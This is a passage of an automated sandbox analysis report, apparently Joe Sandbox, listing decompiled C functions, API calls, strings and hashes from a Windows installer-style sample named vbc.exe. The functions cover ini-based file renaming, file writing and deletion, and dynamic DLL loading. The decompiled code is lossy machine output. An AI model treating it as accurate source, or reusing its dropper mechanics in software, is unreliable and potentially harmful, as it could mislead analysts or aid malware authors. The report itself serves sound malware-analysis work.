                          • Opcode Fuzzy Hash: 1fa3053a276be56ef7da5d68adfba1d9971bfb9fa2beb597bf2db4fb963a824d
                          • Instruction Fuzzy Hash: 8141BC71804249AFCB058FA4CD459BFBFB9FF44314F00802AF551AA1A0C378EA54DFA5
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 93%
                          			E004057D3() {
                          				void* __ebx;
                          				void* __edi;
                          				void* __esi;
                          				intOrPtr* _t15;
                          				long _t16;
                          				intOrPtr _t18;
                          				int _t20;
                          				void* _t28;
                          				long _t29;
                          				intOrPtr* _t37;
                          				int _t43;
                          				void* _t44;
                          				long _t47;
                          				CHAR* _t49;
                          				void* _t51;
                          				void* _t53;
                          				intOrPtr* _t54;
                          				void* _t55;
                          				void* _t56;
                          
                          				_t15 = E00405DA3(1);
                          				_t49 =  *(_t55 + 0x18);
                          				if(_t15 != 0) {
                          					_t20 =  *_t15( *(_t55 + 0x1c), _t49, 5);
                          					if(_t20 != 0) {
                          						L16:
                          						 *0x423f30 =  *0x423f30 + 1;
                          						return _t20;
                          					}
                          				}
                          				 *0x422628 = 0x4c554e;
                          				if(_t49 == 0) {
                          					L5:
                          					_t16 = GetShortPathNameA( *(_t55 + 0x1c), 0x4220a0, 0x400);
                          					if(_t16 != 0 && _t16 <= 0x400) {
                          						_t43 = wsprintfA(0x421ca0, "%s=%s\r\n", 0x422628, 0x4220a0);
                          						_t18 =  *0x423eb0; // 0x8c0fa0
                          						_t56 = _t55 + 0x10;
                          						E00405AA7(_t43, 0x400, 0x4220a0, 0x4220a0,  *((intOrPtr*)(_t18 + 0x128)));
                          						_t20 = E0040575C(0x4220a0, 0xc0000000, 4);
                          						_t53 = _t20;
                          						 *(_t56 + 0x14) = _t53;
                          						if(_t53 == 0xffffffff) {
                          							goto L16;
                          						}
                          						_t47 = GetFileSize(_t53, 0);
                          						_t7 = _t43 + 0xa; // 0xa
                          						_t51 = GlobalAlloc(0x40, _t47 + _t7);
                          						if(_t51 == 0 || ReadFile(_t53, _t51, _t47, _t56 + 0x18, 0) == 0 || _t47 !=  *(_t56 + 0x18)) {
                          							L15:
                          							_t20 = CloseHandle(_t53);
                          							goto L16;
                          						} else {
                          							if(E004056D1(_t51, "[Rename]\r\n") != 0) {
                          								_t28 = E004056D1(_t26 + 0xa, 0x409348);
                          								if(_t28 == 0) {
                          									L13:
                          									_t29 = _t47;
                          									L14:
                          									E0040571D(_t51 + _t29, 0x421ca0, _t43);
                          									SetFilePointer(_t53, 0, 0, 0);
                          									WriteFile(_t53, _t51, _t47 + _t43, _t56 + 0x18, 0);
                          									GlobalFree(_t51);
                          									goto L15;
                          								}
                          								_t37 = _t28 + 1;
                          								_t44 = _t51 + _t47;
                          								_t54 = _t37;
                          								if(_t37 >= _t44) {
                          									L21:
                          									_t53 =  *(_t56 + 0x14);
                          									_t29 = _t37 - _t51;
                          									goto L14;
                          								} else {
                          									goto L20;
                          								}
                          								do {
                          									L20:
                          									 *((char*)(_t43 + _t54)) =  *_t54;
                          									_t54 = _t54 + 1;
                          								} while (_t54 < _t44);
                          								goto L21;
                          							}
                          							E00405A85(_t51 + _t47, "[Rename]\r\n");
                          							_t47 = _t47 + 0xa;
                          							goto L13;
                          						}
                          					}
                          				} else {
                          					CloseHandle(E0040575C(_t49, 0, 1));
                          					_t16 = GetShortPathNameA(_t49, 0x422628, 0x400);
                          					if(_t16 != 0 && _t16 <= 0x400) {
                          						goto L5;
                          					}
                          				}
                          				return _t16;
                          			}

                          APIs
                            • Part of subcall function 00405DA3: GetModuleHandleA.KERNEL32(?,?,00000000,00403268,00000008), ref: 00405DB5
                            • Part of subcall function 00405DA3: LoadLibraryA.KERNEL32(?), ref: 00405DC0
                            • Part of subcall function 00405DA3: GetProcAddress.KERNEL32(00000000,?,?,00000000,00403268,00000008), ref: 00405DD1
                          • CloseHandle.KERNEL32(00000000), ref: 00405820
                          • GetShortPathNameA.KERNEL32 ref: 00405829
                          • GetShortPathNameA.KERNEL32 ref: 00405846
                          • wsprintfA.USER32 ref: 00405864
                          • GetFileSize.KERNEL32(00000000,00000000,004220A0,C0000000,00000004,004220A0,?,?,?,00000000,000000F1,?), ref: 0040589F
                          • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,00000000,000000F1,?), ref: 004058AE
                          • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 004058C4
                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,00421CA0,00000000,-0000000A,00409348,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040590A
                          • WriteFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 0040591C
                          • GlobalFree.KERNEL32(00000000), ref: 00405923
                          • CloseHandle.KERNEL32(00000000), ref: 0040592A
                            • Part of subcall function 004056D1: lstrlenA.KERNEL32(00000000,?,00000000,00000000,004058DF,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004056D8
                            • Part of subcall function 004056D1: lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,004058DF,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405708
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.465307477.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000004.00000002.465300422.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465317101.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465324475.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465332520.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465357223.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465365833.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465373563.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                          Similarity
                          • API ID: File$Handle$CloseGlobalNamePathShortlstrlen$AddressAllocFreeLibraryLoadModulePointerProcReadSizeWritewsprintf
                          • String ID: %s=%s$(&B$[Rename]
                          • API String ID: 3772915668-1834469719
                          • Opcode ID: 59f55a9dc5d97f07b1302869ed359d77eb01a2f99cc6c2b796ec22a8fd90dab3
                          • Instruction ID: f113039d6a8e0b98787bbcb52898fefdd985450d1919188b96c4478b1d7dfea3
                          • Opcode Fuzzy Hash: 59f55a9dc5d97f07b1302869ed359d77eb01a2f99cc6c2b796ec22a8fd90dab3
                          • Instruction Fuzzy Hash: 0F412371A00B11FBD3216B619D48FAB3A5CDB45764F100036FA05F22D2E678A801CEBD
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E00405CE3(CHAR* _a4) {
                          				char _t5;
                          				char _t7;
                          				char* _t15;
                          				char* _t16;
                          				CHAR* _t17;
                          
                          				_t17 = _a4;
                          				if( *_t17 == 0x5c && _t17[1] == 0x5c && _t17[2] == 0x3f && _t17[3] == 0x5c) {
                          					_t17 =  &(_t17[4]);
                          				}
                          				if( *_t17 != 0 && E004055E5(_t17) != 0) {
                          					_t17 =  &(_t17[2]);
                          				}
                          				_t5 =  *_t17;
                          				_t15 = _t17;
                          				_t16 = _t17;
                          				if(_t5 != 0) {
                          					do {
                          						if(_t5 > 0x1f &&  *((char*)(E004055A3("*?|<>/\":", _t5))) == 0) {
                          							E0040571D(_t16, _t17, CharNextA(_t17) - _t17);
                          							_t16 = CharNextA(_t16);
                          						}
                          						_t17 = CharNextA(_t17);
                          						_t5 =  *_t17;
                          					} while (_t5 != 0);
                          				}
                          				 *_t16 =  *_t16 & 0x00000000;
                          				while(1) {
                          					_t16 = CharPrevA(_t15, _t16);
                          					_t7 =  *_t16;
                          					if(_t7 != 0x20 && _t7 != 0x5c) {
                          						break;
                          					}
                          					 *_t16 =  *_t16 & 0x00000000;
                          					if(_t15 < _t16) {
                          						continue;
                          					}
                          					break;
                          				}
                          				return _t7;
                          			}

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.465307477.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000004.00000002.465300422.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465317101.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465324475.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465332520.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465357223.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465365833.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465373563.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                          Similarity
                          • API ID: Char$Next$Prev
                          • String ID: "C:\Users\Public\vbc.exe" $*?|<>/":$C:\Users\user\AppData\Local\Temp\
                          • API String ID: 589700163-1374994687
                          • Opcode ID: 7ea15337aa65b78854fdfbf4a976c6e6ace2ef0f47433067a0fc10695a03ac80
                          • Instruction ID: 2efc38d3d3d4567a91e012bcb7a73cc210910fb997772161a70c169f721ad970
                          • Opcode Fuzzy Hash: 7ea15337aa65b78854fdfbf4a976c6e6ace2ef0f47433067a0fc10695a03ac80
                          • Instruction Fuzzy Hash: 5811E251804B9129EB3226285C48B7B6F89CF97760F18807BE5C1722C2D67C5C429E6D
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E00403E9E(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
                          				struct tagLOGBRUSH _v16;
                          				long _t35;
                          				long _t37;
                          				void* _t40;
                          				long* _t49;
                          
                          				if(_a4 + 0xfffffecd > 5) {
                          					L15:
                          					return 0;
                          				}
                          				_t49 = GetWindowLongA(_a12, 0xffffffeb);
                          				if(_t49 == 0) {
                          					goto L15;
                          				}
                          				_t35 =  *_t49;
                          				if((_t49[5] & 0x00000002) != 0) {
                          					_t35 = GetSysColor(_t35);
                          				}
                          				if((_t49[5] & 0x00000001) != 0) {
                          					SetTextColor(_a8, _t35);
                          				}
                          				SetBkMode(_a8, _t49[4]);
                          				_t37 = _t49[1];
                          				_v16.lbColor = _t37;
                          				if((_t49[5] & 0x00000008) != 0) {
                          					_t37 = GetSysColor(_t37);
                          					_v16.lbColor = _t37;
                          				}
                          				if((_t49[5] & 0x00000004) != 0) {
                          					SetBkColor(_a8, _t37);
                          				}
                          				if((_t49[5] & 0x00000010) != 0) {
                          					_v16.lbStyle = _t49[2];
                          					_t40 = _t49[3];
                          					if(_t40 != 0) {
                          						DeleteObject(_t40);
                          					}
                          					_t49[3] = CreateBrushIndirect( &_v16);
                          				}
                          				return _t49[3];
                          			}

                          APIs
                          Memory Dump Source
                          • Source File: 00000004.00000002.465307477.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000004.00000002.465300422.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465317101.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465324475.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465332520.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465357223.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465365833.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465373563.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                          Similarity
                          • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                          • String ID:
                          • API String ID: 2320649405-0
                          • Opcode ID: 54c4c26d0880f537c7164b4e2121e342b47f232b14c6c2566c024284623f766e
                          • Instruction ID: 00f1469000c5a89127aeec98ef40b5380c975c6b17ce5fce2ee989e1a8c22914
                          • Opcode Fuzzy Hash: 54c4c26d0880f537c7164b4e2121e342b47f232b14c6c2566c024284623f766e
                          • Instruction Fuzzy Hash: D9216271904745ABCB219F68DD08B5BBFF8AF01715B048A69F895E22E1C738E9048B55
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 93%
                          			E0040266E(struct _OVERLAPPED* __ebx) {
                          				void* _t27;
                          				long _t32;
                          				struct _OVERLAPPED* _t47;
                          				void* _t51;
                          				void* _t53;
                          				void* _t56;
                          				void* _t57;
                          				void* _t58;
                          
                          				_t47 = __ebx;
                          				 *(_t58 - 8) = 0xfffffd66;
                          				_t52 = E004029E8(0xfffffff0);
                          				 *(_t58 - 0x44) = _t24;
                          				if(E004055E5(_t52) == 0) {
                          					E004029E8(0xffffffed);
                          				}
                          				E0040573D(_t52);
                          				_t27 = E0040575C(_t52, 0x40000000, 2);
                          				 *(_t58 + 8) = _t27;
                          				if(_t27 != 0xffffffff) {
                          					_t32 =  *0x423eb4; // 0x7e00
                          					 *(_t58 - 0x2c) = _t32;
                          					_t51 = GlobalAlloc(0x40, _t32);
                          					if(_t51 != _t47) {
                          						E004031DA(_t47);
                          						E004031A8(_t51,  *(_t58 - 0x2c));
                          						_t56 = GlobalAlloc(0x40,  *(_t58 - 0x1c));
                          						 *(_t58 - 0x30) = _t56;
                          						if(_t56 != _t47) {
                          							E00402F01(_t49,  *((intOrPtr*)(_t58 - 0x20)), _t47, _t56,  *(_t58 - 0x1c));
                          							while( *_t56 != _t47) {
                          								_t49 =  *_t56;
                          								_t57 = _t56 + 8;
                          								 *(_t58 - 0x38) =  *_t56;
                          								E0040571D( *((intOrPtr*)(_t56 + 4)) + _t51, _t57, _t49);
                          								_t56 = _t57 +  *(_t58 - 0x38);
                          							}
                          							GlobalFree( *(_t58 - 0x30));
                          						}
                          						WriteFile( *(_t58 + 8), _t51,  *(_t58 - 0x2c), _t58 - 8, _t47);
                          						GlobalFree(_t51);
                          						 *(_t58 - 8) = E00402F01(_t49, 0xffffffff,  *(_t58 + 8), _t47, _t47);
                          					}
                          					CloseHandle( *(_t58 + 8));
                          				}
                          				_t53 = 0xfffffff3;
                          				if( *(_t58 - 8) < _t47) {
                          					_t53 = 0xffffffef;
                          					DeleteFileA( *(_t58 - 0x44));
                          					 *((intOrPtr*)(_t58 - 4)) = 1;
                          				}
                          				_push(_t53);
                          				E00401423();
                          				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t58 - 4));
                          				return 0;
                          			}












                          APIs
                          • GlobalAlloc.KERNEL32(00000040,00007E00,00000000,40000000,00000002,00000000,00000000,?,?,000000F0), ref: 004026C2
                          • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,000000F0), ref: 004026DE
                          • GlobalFree.KERNEL32(?), ref: 00402717
                          • WriteFile.KERNEL32(FFFFFD66,00000000,?,FFFFFD66), ref: 00402729
                          • GlobalFree.KERNEL32(00000000), ref: 00402730
                          • CloseHandle.KERNEL32(FFFFFD66), ref: 00402748
                          • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,000000F0), ref: 0040275C
                          Memory Dump Source
                          • Source File: 00000004.00000002.465307477.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000004.00000002.465300422.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465317101.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465324475.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465332520.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465357223.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465365833.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465373563.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                          Similarity
                          • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                          • String ID:
                          • API String ID: 3294113728-0
                          • Opcode ID: 4c0fd2d05d9642674c9ab6b4876f57fc245776767d9f13474b3403e8ff6ab1b0
                          • Instruction ID: 9ca9f948efa3d3b3c01768b84b42719a88da944e93008125b7d5b0dd1b363230
                          • Opcode Fuzzy Hash: 4c0fd2d05d9642674c9ab6b4876f57fc245776767d9f13474b3403e8ff6ab1b0
                          • Instruction Fuzzy Hash: 5B318D71C00128BBDF216FA9CD89D9E7E79EF09364F10422AF910772E0D7795D419BA8
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E00404E23(CHAR* _a4, CHAR* _a8) {
                          				struct HWND__* _v8;
                          				signed int _v12;
                          				CHAR* _v32;
                          				long _v44;
                          				int _v48;
                          				void* _v52;
                          				void* __ebx;
                          				void* __edi;
                          				void* __esi;
                          				CHAR* _t26;
                          				signed int _t27;
                          				CHAR* _t28;
                          				long _t29;
                          				signed int _t39;
                          
                          				_t26 =  *0x423684; // 0x0
                          				_v8 = _t26;
                          				if(_t26 != 0) {
                          					_t27 =  *0x423f54; // 0x0
                          					_v12 = _t27;
                          					_t39 = _t27 & 0x00000001;
                          					if(_t39 == 0) {
                          						E00405AA7(0, _t39, 0x41fc70, 0x41fc70, _a4);
                          					}
                          					_t26 = lstrlenA(0x41fc70);
                          					_a4 = _t26;
                          					if(_a8 == 0) {
                          						L6:
                          						if((_v12 & 0x00000004) == 0) {
                          							_t26 = SetWindowTextA( *0x423668, 0x41fc70);
                          						}
                          						if((_v12 & 0x00000002) == 0) {
                          							_v32 = 0x41fc70;
                          							_v52 = 1;
                          							_t29 = SendMessageA(_v8, 0x1004, 0, 0);
                          							_v44 = 0;
                          							_v48 = _t29 - _t39;
                          							SendMessageA(_v8, 0x1007 - _t39, 0,  &_v52);
                          							_t26 = SendMessageA(_v8, 0x1013, _v48, 0);
                          						}
                          						if(_t39 != 0) {
                          							_t28 = _a4;
                          							 *((char*)(_t28 + 0x41fc70)) = 0;
                          							return _t28;
                          						}
                          					} else {
                          						_t26 =  &(_a4[lstrlenA(_a8)]);
                          						if(_t26 < 0x800) {
                          							_t26 = lstrcatA(0x41fc70, _a8);
                          							goto L6;
                          						}
                          					}
                          				}
                          				return _t26;
                          			}


















                          APIs
                          • lstrlenA.KERNEL32(0041FC70,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C3C,00000000,?), ref: 00404E5C
                          • lstrlenA.KERNEL32(00402C3C,0041FC70,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C3C,00000000), ref: 00404E6C
                          • lstrcatA.KERNEL32(0041FC70,00402C3C,00402C3C,0041FC70,00000000,00000000,00000000), ref: 00404E7F
                          • SetWindowTextA.USER32(0041FC70,0041FC70), ref: 00404E91
                          • SendMessageA.USER32 ref: 00404EB7
                          • SendMessageA.USER32 ref: 00404ED1
                          • SendMessageA.USER32 ref: 00404EDF
                          Memory Dump Source
                          • Source File: 00000004.00000002.465307477.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000004.00000002.465300422.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465317101.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465324475.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465332520.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465357223.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465365833.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465373563.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                          Similarity
                          • API ID: MessageSend$lstrlen$TextWindowlstrcat
                          • String ID:
                          • API String ID: 2531174081-0
                          • Opcode ID: 6af7de6fb12d37621311d767828a5214a6e37c73fc4d498048a22c56ae339c00
                          • Instruction ID: 451019a1d205659c79ebfdec41688bb46c1145c2f0803241f2332644a3b6c24c
                          • Opcode Fuzzy Hash: 6af7de6fb12d37621311d767828a5214a6e37c73fc4d498048a22c56ae339c00
                          • Instruction Fuzzy Hash: 12217C71A00118BBCB119FA5DD809DFBFB9FB44354F00807AF904A6290C7394E45CF98
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E004046F2(struct HWND__* _a4, intOrPtr _a8) {
                          				long _v8;
                          				signed char _v12;
                          				unsigned int _v16;
                          				void* _v20;
                          				intOrPtr _v24;
                          				long _v56;
                          				void* _v60;
                          				long _t15;
                          				unsigned int _t19;
                          				signed int _t25;
                          				struct HWND__* _t28;
                          
                          				_t28 = _a4;
                          				_t15 = SendMessageA(_t28, 0x110a, 9, 0);
                          				if(_a8 == 0) {
                          					L4:
                          					_v56 = _t15;
                          					_v60 = 4;
                          					SendMessageA(_t28, 0x110c, 0,  &_v60);
                          					return _v24;
                          				}
                          				_t19 = GetMessagePos();
                          				_v16 = _t19 >> 0x10;
                          				_v20 = _t19;
                          				ScreenToClient(_t28,  &_v20);
                          				_t25 = SendMessageA(_t28, 0x1111, 0,  &_v20);
                          				if((_v12 & 0x00000066) != 0) {
                          					_t15 = _v8;
                          					goto L4;
                          				}
                          				return _t25 | 0xffffffff;
                          			}















                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.465307477.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000004.00000002.465300422.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465317101.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465324475.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465332520.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465357223.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465365833.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465373563.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                          Similarity
                          • API ID: Message$Send$ClientScreen
                          • String ID: f
                          • API String ID: 41195575-1993550816
                          • Opcode ID: 2a5698d5089c35727aab5c3c5da7bcfb0b51a0b1d2cb1bbeaafe9db8233e3477
                          • Instruction ID: 77fe7446b7d437ffed3a300e181f1a5f8136abba45dafe536ab26234a61f9ca7
                          • Opcode Fuzzy Hash: 2a5698d5089c35727aab5c3c5da7bcfb0b51a0b1d2cb1bbeaafe9db8233e3477
                          • Instruction Fuzzy Hash: 74014071D00219BADB01DBA4DD45BFEBBB8AB55711F10012ABA10B71C0D7B4A5018B95
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E00402B2D(struct HWND__* _a4, intOrPtr _a8) {
                          				char _v68;
                          				void* _t11;
                          				CHAR* _t19;
                          
                          				if(_a8 == 0x110) {
                          					SetTimer(_a4, 1, 0xfa, 0);
                          					_a8 = 0x113;
                          				}
                          				if(_a8 == 0x113) {
                          					_t11 = E00402BA9();
                          					_t19 = "unpacking data: %d%%";
                          					if( *0x423eb0 == 0) {
                          						_t19 = "verifying installer: %d%%";
                          					}
                          					wsprintfA( &_v68, _t19, _t11);
                          					SetWindowTextA(_a4,  &_v68);
                          					SetDlgItemTextA(_a4, 0x406,  &_v68);
                          				}
                          				return 0;
                          			}







                          APIs
                          • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402B48
                          • wsprintfA.USER32 ref: 00402B7C
                          • SetWindowTextA.USER32(?,?), ref: 00402B8C
                          • SetDlgItemTextA.USER32(?,00000406,?), ref: 00402B9E
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.465307477.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000004.00000002.465300422.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465317101.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465324475.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465332520.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465357223.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465365833.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465373563.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                          Similarity
                          • API ID: Text$ItemTimerWindowwsprintf
                          • String ID: unpacking data: %d%%$verifying installer: %d%%
                          • API String ID: 1451636040-1158693248
                          • Opcode ID: e04cdd19e0c63b62eaa7e8eced31868a1262f8adf0a2f46f7645d1242f1aea5d
                          • Instruction ID: 63589245c82b20a35a818b51aea08eb627593e3ecb5db54badb7bc3d6c1792f2
                          • Opcode Fuzzy Hash: e04cdd19e0c63b62eaa7e8eced31868a1262f8adf0a2f46f7645d1242f1aea5d
                          • Instruction Fuzzy Hash: F3F01D70900209ABEF215F50DD0ABAA3779BB04345F00803AFA06A91D1D7B9AA569B99
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 56%
                          			E00401F51(void* __ebx, void* __eflags) {
                          				void* _t26;
                          				struct HINSTANCE__* _t29;
                          				CHAR* _t31;
                          				intOrPtr* _t32;
                          				void* _t33;
                          
                          				_t26 = __ebx;
                          				asm("sbb eax, 0x423f58");
                          				 *(_t33 - 4) = 1;
                          				if(__eflags < 0) {
                          					_push(0xffffffe7);
                          					L14:
                          					E00401423();
                          					L15:
                          					 *0x423f28 =  *0x423f28 +  *(_t33 - 4);
                          					return 0;
                          				}
                          				_t31 = E004029E8(0xfffffff0);
                          				 *(_t33 + 8) = E004029E8(1);
                          				if( *((intOrPtr*)(_t33 - 0x14)) == __ebx) {
                          					L3:
                          					_t29 = LoadLibraryExA(_t31, _t26, 8);
                          					if(_t29 == _t26) {
                          						_push(0xfffffff6);
                          						goto L14;
                          					}
                          					L4:
                          					_t32 = GetProcAddress(_t29,  *(_t33 + 8));
                          					if(_t32 == _t26) {
                          						E00404E23(0xfffffff7,  *(_t33 + 8));
                          					} else {
                          						 *(_t33 - 4) = _t26;
                          						if( *((intOrPtr*)(_t33 - 0x1c)) == _t26) {
                          							 *_t32( *((intOrPtr*)(_t33 - 0x34)), 0x400, 0x424000, 0x40af68, " ?B");
                          						} else {
                          							E00401423( *((intOrPtr*)(_t33 - 0x1c)));
                          							if( *_t32() != 0) {
                          								 *(_t33 - 4) = 1;
                          							}
                          						}
                          					}
                          					if( *((intOrPtr*)(_t33 - 0x18)) == _t26) {
                          						FreeLibrary(_t29);
                          					}
                          					goto L15;
                          				}
                          				_t29 = GetModuleHandleA(_t31);
                          				if(_t29 != __ebx) {
                          					goto L4;
                          				}
                          				goto L3;
                          			}









                          APIs
                          • GetModuleHandleA.KERNEL32(00000000,00000001,000000F0), ref: 00401F7C
                            • Part of subcall function 00404E23: lstrlenA.KERNEL32(0041FC70,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C3C,00000000,?), ref: 00404E5C
                            • Part of subcall function 00404E23: lstrlenA.KERNEL32(00402C3C,0041FC70,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C3C,00000000), ref: 00404E6C
                            • Part of subcall function 00404E23: lstrcatA.KERNEL32(0041FC70,00402C3C,00402C3C,0041FC70,00000000,00000000,00000000), ref: 00404E7F
                            • Part of subcall function 00404E23: SetWindowTextA.USER32(0041FC70,0041FC70), ref: 00404E91
                            • Part of subcall function 00404E23: SendMessageA.USER32 ref: 00404EB7
                            • Part of subcall function 00404E23: SendMessageA.USER32 ref: 00404ED1
                            • Part of subcall function 00404E23: SendMessageA.USER32 ref: 00404EDF
                          • LoadLibraryExA.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00401F8C
                          • GetProcAddress.KERNEL32(00000000,?,?,00000008,00000001,000000F0), ref: 00401F9C
                          • FreeLibrary.KERNEL32(00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 00401FF9
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.465307477.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000004.00000002.465300422.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465317101.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465324475.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465332520.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465357223.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465365833.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465373563.000000000042C000.00000002.00000001.01000000.00000003.sdmp
